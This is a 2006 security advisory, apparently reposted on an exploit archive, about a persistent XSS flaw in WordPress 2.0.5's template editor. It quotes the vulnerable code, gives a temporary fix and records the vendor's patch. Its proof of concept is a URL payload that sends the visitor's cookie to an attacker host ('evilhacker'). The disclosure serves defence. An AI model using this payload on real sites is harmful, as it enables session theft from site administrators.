Home / os / solaris

wp205-xss.txt

Posted on 28 December 2006

Vulnerability Title: WordPress Persistent XSS Author: David Kierznowski Homepage: http://michaeldaw.org Software Vendor: WordPress Persistent XSS Versions affected: Confirmed in v2.0.5 (latest) WordPress is a popular open source blogging software. A persistent XSS vulnerability has been found in WordPress (to be honest I have found a few problems and hope to publish these soon). This issue affects the latest version v2.0.5. Discussion: When editing files a shortcut is created titled recently accessed files. The anchor tag text is correctly escaped with wp_specialchars(); however, the link title is not sanitised. Instead, it is passed to get_file_description($file). The only restriction or limitation here is that our text is passed through basename. This means standard script tags will fail when ending with /. We can get around this by using open IMG tags; this works under FF and IE. Vulnerable code: wp-admin/templates.php: [line 22]$recents = get_option('recently_edited'); [line 72]update_recently_edited($file); [Line 116]:foreach ($recents as $recent) : echo "<li><a href='templates.php?file=" . wp_specialchars($recent, true) . "'>" . get_file_description(basename($recent)) . "</a></li>"; Vulnerable function: function get_file_description($file) { global $wp_file_descriptions; if (isset ($wp_file_descriptions[basename($file)])) { return $wp_file_descriptions[basename($file)]; } elseif (file_exists(ABSPATH.$file)) { $template_data = implode('', file(ABSPATH.$file)); if (preg_match("|Template Name:(.*)|i", $template_data, $name)) return $name[1]; } return basename($file); } Proof of concept: https://blogsite/wp/wp-admin/templates.php?file=<img src="" onerror=javascript:document.location.href= 'http://evilhacker/capturecookie.php?'+document.cookie;> Temp Fix: Comment out the following line in wp-admin/templates.php [Line 72] update_recently_edited($file); WordPress was contacted: 26/12/06 22:04 BST Reply received: 27/12/06 06:11 BST WordPress has fixed this for v2.0.6 and a patch has been released for v2.0.5, see http://trac.wordpress.org/changeset/4665

 

TOP